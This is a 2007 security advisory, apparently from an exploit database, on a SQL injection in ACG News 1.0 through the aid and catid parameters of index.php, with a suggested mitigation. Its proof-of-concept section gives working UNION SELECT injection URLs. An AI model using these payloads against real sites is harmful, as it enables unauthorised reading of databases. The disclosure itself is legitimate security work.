ACG News SQL Injection

vendor:

ACG News

by:

David Sopas Ferreira

5.5

CVSS

MEDIUM

SQL Injection

CWE

Product Name: ACG News

Affected Version From: ACG News 1.0

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Vulnerable variables are $aid and $catid on index.php file.

Mitigation:

The script should filter metacharacters from user input.

Source

Exploit-DB raw data:

ACG News SQL Injection

Software: ACG News 1.0
Vendor link: http://www.altercoder.com
Vendor Demo link: http://acgnews.uw.hu/index.php
Attack: SQL Injection

Original Advisory:
http://14house.blogspot.com/2007/08/acg-news-sql-injection.html

Discovered by: David Sopas Ferreira a.k.a SmOk3 < smok3f00 at gmail.com >

SQL Injection
-------------
An attacker may execute arbitrary SQL statements on the vulnerable
system. This may compromise the integrity of your database and/or
expose sensitive information. Vulnerable variables are $aid and $catid
on index.php file.

Proof of Concept:
index.php?menu=showarticle&aid=[SQL INJECTION]
index.php?menu=showarticle&aid=-3 UNION ALL SELECT 1,@@version,3,4,5,user(),7

index.php?menu=showcat&catid=[SQL INJECTION]
index.php?menu=showcat&catid=-3 UNION ALL SELECT 1,@@version


Solution:

Your script should filter metacharacters from user input.


Vendor contacted but I'm waiting for reply.

# milw0rm.com [2007-08-28]